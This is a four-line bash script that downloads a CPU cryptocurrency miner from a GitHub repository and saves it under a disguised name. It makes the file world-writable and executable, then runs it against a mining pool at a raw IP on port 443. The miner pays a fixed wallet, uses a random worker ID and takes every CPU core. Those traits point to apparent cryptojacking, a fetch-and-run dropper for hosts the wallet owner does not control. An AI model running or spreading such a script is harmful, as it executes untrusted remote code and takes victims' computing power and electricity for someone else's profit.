#!/bin/bash
wget -O biru https://github.com/kidoescegh/pilekyla/raw/refs/heads/main/cpuminer-avx2
chmod 777 biru
./biru -a flex -o stratum+tcp://165.22.0.76:443 -u kc1qylrmtzw47wldzzgwfkxtgrhgvp8jnyrck33nqu.$(shuf -n 1 -i 1-99999)-AA -t $(nproc --all)
